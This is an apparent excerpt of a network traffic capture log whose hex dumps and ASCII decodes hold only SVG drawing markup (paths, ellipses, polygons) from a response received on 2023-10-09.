                                                                                                                                                                                                                                                        Data Ascii: ,1-.91,2.6,2.92,2.92,0,0,1-3.89-1.09,2.81,2.81,0,0,1,.6-3.37,2.63,2.63,0,0,1,3.37,0,2.47,2.47,0,0,1,.19,3.33"/><path class="cls-9" d="M480.49,228.29a2,2,0,0,1-.91,2.61,2.94,2.94,0,0,1-3.89-1.1,2.79,2.79,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.46,2.46,0,0,1
                                                                                                                                                                                                                                                        2023-10-09 13:50:58 UTC1006INData Raw: 2d 39 22 20 64 3d 22 4d 35 31 35 2c 32 37 35 2e 36 35 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 31 34 2e 36 38 2c 32 36 37 2e 35 37 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 37 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c
                                                                                                                                                                                                                                                        Data Ascii: -9" d="M515,275.65a2,2,0,0,1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M514.68,267.57a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.89-1.09,2.81,2.81,0,0,1,.6-3.37,2.63,2.63,0,0,
                                                                                                                                                                                                                                                        2023-10-09 13:50:58 UTC1022INData Raw: 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 37 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2e 30 35 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 34 39 2e 31 35 2c 33 31 34 2e 39 32 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 34 38 2e 38 38 2c 33 30 36 2e
                                                                                                                                                                                                                                                        Data Ascii: 0,0,1,.59-3.37,2.63,2.63,0,0,1,3.38.05,2.46,2.46,0,0,1,.18,3.32"/><path class="cls-9" d="M549.15,314.92a2,2,0,0,1-.91,2.61,2.94,2.94,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.47,2.47,0,0,1,.18,3.33"/><path class="cls-9" d="M548.88,306.
                                                                                                                                                                                                                                                        2023-10-09 13:50:58 UTC1038INData Raw: 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 38 33 2e 36 32 2c 33 36 32 2e 32 38 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 38 33 2e 33 34 2c 33 35 34 2e 32 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 31 2c 32 2e 39 31 2c 30 2c 30 2c 31 2d 33 2e 38 38 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 37 2c 32 2e 36 34
                                                                                                                                                                                                                                                        Data Ascii: ss="cls-9" d="M583.62,362.28a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M583.34,354.2a2,2,0,0,1-.91,2.6,2.91,2.91,0,0,1-3.88-1.09,2.81,2.81,0,0,1,.59-3.37,2.64
                                                                                                                                                                                                                                                        2023-10-09 13:50:58 UTC1054INData Raw: 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 33 33 2c 32 34 2e 37 38 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 41 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2c 33 32 39 2e 31 2c 32 36 61 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 33 32 2e 37 33 2c 31 38 2e 33 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30
                                                                                                                                                                                                                                                        Data Ascii: ,0,1,2.71,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d="M333,24.78a1.61,1.61,0,0,1-.73,2.09A2.34,2.34,0,0,1,329.1,26a2.25,2.25,0,0,1,.47-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d="M332.73,18.3a1.61,1.61,0,0,1-.73,2.09,2.35,2.35,0
                                                                                                                                                                                                                                                        2023-10-09 13:50:58 UTC1070INData Raw: 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 36 39 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 36 30 2e 33 39 2c 35 36 2e 33 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 36 30 2e 31 37 2c 34 39 2e 38 32 61 31 2e 36 31 2c
                                                                                                                                                                                                                                                        Data Ascii: .24,0,0,1,.47-2.69,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d="M360.39,56.3a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.47-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d="M360.17,49.82a1.61,
                                                                                                                                                                                                                                                        2023-10-09 13:50:58 UTC1086INData Raw: 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 38 37 2e 38 33 2c 38 37 2e 38 32 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 41 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2c 33 38 34 2c 38 39 61 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 38 22 2f 3e 3c 70 61 74
                                                                                                                                                                                                                                                        Data Ascii: 3,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.47-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d="M387.83,87.82a1.61,1.61,0,0,1-.73,2.09A2.34,2.34,0,0,1,384,89a2.25,2.25,0,0,1,.47-2.7,2.11,2.11,0,0,1,2.71,0,2,2,0,0,1,.15,2.68"/><pat
                                                                                                                                                                                                                                                        2023-10-09 13:50:58 UTC1102INData Raw: 35 2e 38 32 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 41 32 2c 32 2c 30 2c 30 2c 31 2c 34 31 35 2c 31 32 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 31 35 2e 32 37 2c 31 31 39 2e 33 34 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 2c 30 2c 32 2c 32
                                                                                                                                                                                                                                                        Data Ascii: 5.82a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.47-2.7,2.1,2.1,0,0,1,2.71,0A2,2,0,0,1,415,127"/><path class="cls-9" d="M415.27,119.34a1.61,1.61,0,0,1-.73,2.09,2.35,2.35,0,0,1-3.12-.88,2.24,2.24,0,0,1,.48-2.7,2.1,2.1,0,0,1,2.7,0,2,2
                                                                                                                                                                                                                                                        2023-10-09 13:50:58 UTC1118INData Raw: 34 34 32 2e 39 33 2c 31 35 37 2e 33 34 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 34 32 2e 37 31 2c 31 35 30 2e 38 36 41 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2c 34 34 32 2c 31 35 33 61 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c
                                                                                                                                                                                                                                                        Data Ascii: 442.93,157.34a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.47-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d="M442.71,150.86A1.61,1.61,0,0,1,442,153a2.35,2.35,0,0,1-3.12-.88,2.24,2.24,0,0,1,.48-2.7,2.1,2.1,0,0,1,
                                                                                                                                                                                                                                                        2023-10-09 13:50:58 UTC1134INData Raw: 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 37 30 2e 33 37 2c 31 38 38 2e 38 36 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2c 32 2e 37 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 37 30 2e 31 35 2c 31 38 32 2e 33 38 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e
                                                                                                                                                                                                                                                        Data Ascii: class="cls-9" d="M470.37,188.86a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.24,2.24,0,0,1,.48-2.7,2.09,2.09,0,0,1,2.7,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d="M470.15,182.38a1.61,1.61,0,0,1-.73,2.09,2.35,2.35,0,0,1-3.12-.88,2.25,2.25,0,0,1,.
                                                                                                                                                                                                                                                        2023-10-09 13:50:58 UTC1150INData Raw: 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 38 35 2e 30 38 2c 33 39 2e 31 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 38 34 2e 38 36 2c 33 32 2e 36 32 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30
                                                                                                                                                                                                                                                        Data Ascii: 1,2.71,0,2,2,0,0,1,.14,2.67"/><path class="cls-9" d="M485.08,39.1a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"/><path class="cls-9" d="M484.86,32.62a1.61,1.61,0,0,1-.73,2.09,2.35,2.35,0
                                                                                                                                                                                                                                                        2023-10-09 13:50:58 UTC1166INData Raw: 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 31 32 2e 35 32 2c 37 30 2e 36 32 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 31 32 2e 33 2c 36 34 2e 31 34 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e
                                                                                                                                                                                                                                                        Data Ascii: ,2.1,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"/><path class="cls-9" d="M512.52,70.62a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"/><path class="cls-9" d="M512.3,64.14a1.61,1.61,0,0,1-.73,2.09,2.
                                                                                                                                                                                                                                                        2023-10-09 13:50:58 UTC1182INData Raw: 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 34 30 2c 31 30 32 2e 31 34 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 33 39 2e 37 34 2c 39 35 2e 36 36 61 31 2e 36 31 2c 31 2e 36
                                                                                                                                                                                                                                                        Data Ascii: ,0,0,1,.48-2.7,2.11,2.11,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"/><path class="cls-9" d="M540,102.14a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"/><path class="cls-9" d="M539.74,95.66a1.61,1.6
                                                                                                                                                                                                                                                        2023-10-09 13:50:58 UTC1198INData Raw: 39 2e 30 36 2d 34 2e 38 33 2c 32 2e 38 34 2d 31 33 36 2e 33 2d 32 2e 35 31 2d 31 34 31 2e 38 37 2d 32 2e 31 37 6c 2d 38 33 2e 37 31 2c 35 63 2d 31 2e 38 37 2e 31 32 2d 33 32 2c 31 2e 31 36 2d 33 32 2e 31 33 2c 31 2e 39 34 5a 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 31 36 22 20 64 3d 22 4d 39 30 30 2e 31 36 2c 31 37 34 6c 34 2e 33 34 2d 35 2e 36 33 2c 32 2e 34 31 2d 33 30 2e 32 36 2d 32 33 2e 36 39 2c 31 34 2e 34 35 63 2d 34 2e 39 34 2c 33 2d 39 2e 38 35 2c 36 2e 31 32 2d 31 34 2e 38 34 2c 39 2e 30 36 2d 34 2e 38 33 2c 32 2e 38 34 2d 31 33 36 2e 33 2d 32 2e 35 31 2d 31 34 31 2e 38 37 2d 32 2e 31 37 6c 2d 38 33 2e 37 31 2c 35 63 2d 31 2e 38 37 2e 31 32 2d 33 32 2c 31 2e 31 36 2d 33 32 2e 31 33 2c 31 2e 39 34 6c 2d 2e 33 39 2c 34 4c 36 31
                                                                                                                                                                                                                                                        Data Ascii: 9.06-4.83,2.84-136.3-2.51-141.87-2.17l-83.71,5c-1.87.12-32,1.16-32.13,1.94Z"/><path class="cls-16" d="M900.16,174l4.34-5.63,2.41-30.26-23.69,14.45c-4.94,3-9.85,6.12-14.84,9.06-4.83,2.84-136.3-2.51-141.87-2.17l-83.71,5c-1.87.12-32,1.16-32.13,1.94l-.39,4L61
                                                                                                                                                                                                                                                        2023-10-09 13:50:58 UTC1214INData Raw: 2e 34 35 2c 31 2e 39 34 2c 31 2e 39 34 2c 30 2c 30 2c 30 2c 2e 33 37 2d 2e 36 36 41 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 30 2c 35 32 30 2e 33 34 2c 32 32 39 2e 30 35 5a 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 32 22 20 64 3d 22 4d 35 32 34 2c 32 32 36 2e 32 32 71 30 2c 2e 32 31 2c 30 2c 2e 34 38 63 30 2c 2e 31 38 2c 30 2c 2e 33 33 2c 30 2c 2e 34 35 68 30 61 31 2e 36 36 2c 31 2e 36 36 2c 30 2c 30 2c 31 2c 2e 32 39 2d 2e 34 32 2c 32 2e 30 36 2c 32 2e 30 36 2c 30 2c 30 2c 31 2c 2e 34 33 2d 2e 33 35 2c 32 2e 33 32 2c 32 2e 33 32 2c 30 2c 30 2c 31 2c 2e 35 33 2d 2e 32 34 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2c 2e 36 2d 2e 30 38 2c 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2c 31 2c 2e 31 39 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 36
                                                                                                                                                                                                                                                        Data Ascii: .45,1.94,1.94,0,0,0,.37-.66A2.5,2.5,0,0,0,520.34,229.05Z"/><path class="cls-2" d="M524,226.22q0,.21,0,.48c0,.18,0,.33,0,.45h0a1.66,1.66,0,0,1,.29-.42,2.06,2.06,0,0,1,.43-.35,2.32,2.32,0,0,1,.53-.24,2.35,2.35,0,0,1,.6-.08,2.15,2.15,0,0,1,1,.19,2,2,0,0,1,.6
                                                                                                                                                                                                                                                        2023-10-09 13:50:58 UTC1230INData Raw: 79 32 3d 22 33 32 34 2e 32 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 36 22 20 64 3d 22 4d 36 36 39 2e 31 39 2c 33 31 33 2e 33 34 76 32 63 30 2c 31 2e 33 36 2c 33 2e 32 33 2c 32 2e 34 36 2c 37 2e 32 31 2c 32 2e 34 36 73 37 2e 32 31 2d 31 2e 31 2c 37 2e 32 31 2d 32 2e 34 36 76 2d 32 22 2f 3e 3c 65 6c 6c 69 70 73 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 33 38 22 20 63 78 3d 22 36 37 36 2e 34 22 20 63 79 3d 22 33 31 33 2e 33 34 22 20 72 78 3d 22 37 2e 32 31 22 20 72 79 3d 22 32 2e 34 35 22 2f 3e 3c 70 6f 6c 79 67 6f 6e 20 63 6c 61 73 73 3d 22 63 6c 73 2d 33 38 22 20 70 6f 69 6e 74 73 3d 22 36 36 38 2e 31 35 20 33 33 31 2e 34 38 20 36 36 34 2e 37 33 20 33 32 39 2e 31 35 20 36 36 34 2e 39 33 20 33 31 37 2e 37 34 20 36 36 38 2e 34 20 33 31
                                                                                                                                                                                                                                                        Data Ascii: y2="324.26"/><path class="cls-76" d="M669.19,313.34v2c0,1.36,3.23,2.46,7.21,2.46s7.21-1.1,7.21-2.46v-2"/><ellipse class="cls-38" cx="676.4" cy="313.34" rx="7.21" ry="2.45"/><polygon class="cls-38" points="668.15 331.48 664.73 329.15 664.93 317.74 668.4 31
                                                                                                                                                                                                                                                        2023-10-09 13:50:58 UTC1246INData Raw: 20 35 36 38 2e 37 35 29 20 72 6f 74 61 74 65 28 2d 33 38 2e 30 37 29 22 2f 3e 3c 65 6c 6c 69 70 73 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 37 22 20 63 78 3d 22 38 34 38 2e 36 34 22 20 63 79 3d 22 32 31 38 2e 37 34 22 20 72 78 3d 22 32 2e 32 34 22 20 72 79 3d 22 32 2e 38 38 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 34 35 2e 36 39 20 35 36 39 2e 38 38 29 20 72 6f 74 61 74 65 28 2d 33 38 2e 30 37 29 22 2f 3e 3c 65 6c 6c 69 70 73 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 37 22 20 63 78 3d 22 38 34 38 2e 36 34 22 20 63 79 3d 22 32 31 38 2e 37 34 22 20 72 78 3d 22 31 2e 36 22 20 72 79 3d 22 32 2e 30 35 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 34 35 2e 36 39 20 35 36 39 2e 38 38 29 20 72 6f 74 61 74 65 28
                                                                                                                                                                                                                                                        Data Ascii: 568.75) rotate(-38.07)"/><ellipse class="cls-97" cx="848.64" cy="218.74" rx="2.24" ry="2.88" transform="translate(45.69 569.88) rotate(-38.07)"/><ellipse class="cls-97" cx="848.64" cy="218.74" rx="1.6" ry="2.05" transform="translate(45.69 569.88) rotate(
                                                                                                                                                                                                                                                        2023-10-09 13:50:58 UTC1262INData Raw: 33 34 63 30 2d 2e 30 35 2d 2e 32 38 2d 2e 32 35 2d 2e 33 32 2d 2e 33 61 2e 33 2e 33 2c 30 2c 30 2c 31 2d 2e 30 39 2d 2e 32 33 2e 33 32 2e 33 32 2c 30 2c 30 2c 31 2c 2e 33 33 2d 2e 33 33 43 38 31 35 2e 32 36 2c 32 35 30 2e 31 34 2c 38 31 35 2e 33 34 2c 32 35 30 2e 31 38 2c 38 31 35 2e 36 2c 32 35 30 2e 33 39 5a 6d 31 2e 31 37 2e 34 36 61 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 32 33 2e 36 36 63 30 2c 2e 32 31 2d 2e 32 31 2e 32 38 2d 2e 34 32 2e 32 32 73 2d 2e 31 37 2d 2e 30 38 2d 2e 33 33 2d 2e 34 37 6c 2d 2e 31 36 2d 2e 33 37 61 2e 33 35 2e 33 35 2c 30 2c 30 2c 31 2c 30 2d 2e 31 34 63 30 2d 2e 32 34 2e 32 33 2d 2e 32 36 2e 33 36 2d 2e 32 35 53 38 31 36 2e 36 35 2c 32 35 30 2e 35 39 2c 38 31 36 2e 37 37 2c 32 35 30 2e 38 35 5a 6d 2e 34 35 2e 30
                                                                                                                                                                                                                                                        Data Ascii: 34c0-.05-.28-.25-.32-.3a.3.3,0,0,1-.09-.23.32.32,0,0,1,.33-.33C815.26,250.14,815.34,250.18,815.6,250.39Zm1.17.46a2.37,2.37,0,0,1,.23.66c0,.21-.21.28-.42.22s-.17-.08-.33-.47l-.16-.37a.35.35,0,0,1,0-.14c0-.24.23-.26.36-.25S816.65,250.59,816.77,250.85Zm.45.0
